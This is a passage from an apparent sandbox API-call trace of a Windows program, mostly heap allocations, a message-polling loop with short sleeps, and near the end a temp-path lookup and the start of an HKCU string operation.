hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.682] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0268.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0268.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0268.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.683] timeGetTime () returned 0x455eb [0268.683] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.683] Sleep (dwMilliseconds=0xa) [0268.695] timeGetTime () returned 0x455fb [0268.695] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.695] Sleep (dwMilliseconds=0xa) [0268.710] timeGetTime () returned 0x4560a [0268.711] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.711] Sleep (dwMilliseconds=0xa) [0268.726] timeGetTime () returned 0x4561a [0268.726] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.726] Sleep (dwMilliseconds=0xa) [0268.742] timeGetTime () returned 0x45629 [0268.742] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.742] Sleep (dwMilliseconds=0xa) [0268.758] timeGetTime () returned 0x45639 [0268.758] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.758] Sleep (dwMilliseconds=0xa) [0268.773] timeGetTime () returned 0x45649 [0268.773] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.773] Sleep (dwMilliseconds=0xa) [0268.796] timeGetTime () returned 0x45658 [0268.796] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.796] Sleep (dwMilliseconds=0xa) [0268.806] timeGetTime () returned 0x45668 [0268.806] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.806] Sleep (dwMilliseconds=0xa) [0268.820] timeGetTime () returned 0x45677 [0268.820] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.820] Sleep (dwMilliseconds=0xa) [0268.835] timeGetTime () returned 0x45687 [0268.835] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.835] Sleep (dwMilliseconds=0xa) [0268.851] timeGetTime () returned 0x45697 [0268.851] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.851] Sleep (dwMilliseconds=0xa) [0268.866] timeGetTime () returned 0x456a6 [0268.866] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.866] Sleep (dwMilliseconds=0xa) [0268.882] timeGetTime () returned 0x456b6 [0268.882] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.882] Sleep (dwMilliseconds=0xa) [0268.898] timeGetTime () returned 0x456c5 [0268.898] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.898] Sleep (dwMilliseconds=0xa) [0268.913] timeGetTime () returned 0x456d5 [0268.913] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.913] Sleep (dwMilliseconds=0xa) [0268.929] timeGetTime () returned 0x456e5 [0268.929] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.929] Sleep (dwMilliseconds=0xa) [0268.944] timeGetTime () returned 0x456f4 [0268.944] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.944] Sleep (dwMilliseconds=0xa) [0268.960] timeGetTime () returned 0x45704 [0268.960] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.960] Sleep (dwMilliseconds=0xa) [0268.976] timeGetTime () returned 0x45713 [0268.976] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.976] Sleep (dwMilliseconds=0xa) [0268.991] timeGetTime () returned 0x45723 [0268.991] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0268.991] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0268.991] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0268.991] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0268.991] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0268.992] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0268.992] Sleep (dwMilliseconds=0xa) [0269.007] timeGetTime () returned 0x45733 [0269.007] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.007] Sleep (dwMilliseconds=0xa) [0269.022] timeGetTime () returned 0x45742 [0269.022] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.022] Sleep (dwMilliseconds=0xa) [0269.038] timeGetTime () returned 0x45752 [0269.039] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.039] Sleep (dwMilliseconds=0xa) [0269.059] timeGetTime () returned 0x45761 [0269.059] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.059] Sleep (dwMilliseconds=0xa) [0269.072] timeGetTime () returned 0x45771 [0269.072] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.072] Sleep (dwMilliseconds=0xa) [0269.085] timeGetTime () returned 0x45781 [0269.085] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.085] Sleep (dwMilliseconds=0xa) [0269.101] timeGetTime () returned 0x45790 [0269.101] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.101] Sleep (dwMilliseconds=0xa) [0269.124] timeGetTime () returned 0x457a0 [0269.124] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.124] Sleep (dwMilliseconds=0xa) [0269.132] timeGetTime () returned 0x457af [0269.132] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.132] Sleep (dwMilliseconds=0xa) [0269.148] timeGetTime () returned 0x457bf [0269.148] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.148] Sleep (dwMilliseconds=0xa) [0269.163] timeGetTime () returned 0x457cf [0269.163] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.163] Sleep (dwMilliseconds=0xa) [0269.179] timeGetTime () returned 0x457de [0269.179] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.179] Sleep (dwMilliseconds=0xa) [0269.194] timeGetTime () returned 0x457ee [0269.194] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.195] Sleep (dwMilliseconds=0xa) [0269.209] timeGetTime () returned 0x457fd [0269.210] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.210] Sleep (dwMilliseconds=0xa) [0269.225] timeGetTime () returned 0x4580d [0269.225] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.225] Sleep (dwMilliseconds=0xa) [0269.243] timeGetTime () returned 0x4581d [0269.244] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.245] Sleep (dwMilliseconds=0xa) [0269.257] timeGetTime () returned 0x4582c [0269.257] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.259] Sleep (dwMilliseconds=0xa) [0269.277] timeGetTime () returned 0x4583c [0269.277] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.277] Sleep (dwMilliseconds=0xa) [0269.288] timeGetTime () returned 0x4584b [0269.288] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.288] Sleep (dwMilliseconds=0xa) [0269.304] timeGetTime () returned 0x4585b [0269.304] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.304] Sleep (dwMilliseconds=0xa) [0269.319] timeGetTime () returned 0x4586b [0269.319] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.319] Sleep (dwMilliseconds=0xa) [0269.335] timeGetTime () returned 0x4587a [0269.339] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.339] Sleep (dwMilliseconds=0xa) [0269.355] timeGetTime () returned 0x4588a [0269.355] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.356] Sleep (dwMilliseconds=0xa) [0269.367] timeGetTime () returned 0x45899 [0269.367] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.367] Sleep (dwMilliseconds=0xa) [0269.381] timeGetTime () returned 0x458a9 [0269.381] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.381] Sleep (dwMilliseconds=0xa) [0269.397] timeGetTime () returned 0x458b9 [0269.397] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.397] Sleep (dwMilliseconds=0xa) [0269.412] timeGetTime () returned 0x458c8 [0269.412] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.413] Sleep (dwMilliseconds=0xa) [0269.428] timeGetTime () returned 0x458d8 [0269.428] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.428] Sleep (dwMilliseconds=0xa) [0269.444] timeGetTime () returned 0x458e7 [0269.444] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.444] Sleep (dwMilliseconds=0xa) [0269.459] timeGetTime () returned 0x458f7 [0269.459] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.459] Sleep (dwMilliseconds=0xa) [0269.475] timeGetTime () returned 0x45907 [0269.476] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.476] Sleep (dwMilliseconds=0xa) [0269.490] timeGetTime () returned 0x45916 [0269.491] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.491] Sleep (dwMilliseconds=0xa) [0269.508] timeGetTime () returned 0x45926 [0269.508] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.508] Sleep (dwMilliseconds=0xa) [0269.522] timeGetTime () returned 0x45935 [0269.522] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.522] Sleep (dwMilliseconds=0xa) [0269.607] timeGetTime () returned 0x45983 [0269.610] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.610] Sleep (dwMilliseconds=0xa) [0269.615] timeGetTime () returned 0x45993 [0269.615] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.615] Sleep (dwMilliseconds=0xa) [0269.632] timeGetTime () returned 0x459a3 [0269.632] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.632] Sleep (dwMilliseconds=0xa) [0269.646] timeGetTime () returned 0x459b2 [0269.646] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.646] Sleep (dwMilliseconds=0xa) [0269.662] timeGetTime () returned 0x459c2 [0269.662] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.662] Sleep (dwMilliseconds=0xa) [0269.678] timeGetTime () returned 0x459d1 [0269.678] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0269.678] Sleep (dwMilliseconds=0xa) [0269.693] timeGetTime () returned 0x459e1 [0269.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0269.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0269.694] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0269.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0269.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0269.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0269.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0269.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0269.695] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0269.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0269.695] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0269.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0269.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0269.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0269.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0269.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0269.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0269.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0269.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0269.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3570 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0269.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0269.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0269.697] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: 